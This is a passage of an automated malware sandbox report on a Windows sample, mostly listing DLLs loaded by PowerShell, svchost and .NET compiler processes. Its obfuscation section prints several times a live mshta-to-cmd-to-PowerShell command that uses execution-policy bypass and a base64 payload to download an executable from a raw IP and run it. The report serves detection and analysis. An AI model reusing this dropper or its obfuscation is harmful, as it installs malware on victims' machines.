    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: q7C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.pdb source: powershell.exe, 00000003.00000002.1268592235.00000000053C1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb. source: powershell.exe, 00000003.00000002.1275318772.0000000007799000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    PowerShell case anomaly found
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"Jump to behavior
    Suspicious command line found
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"Jump to behavior
    Suspicious powershell command line found
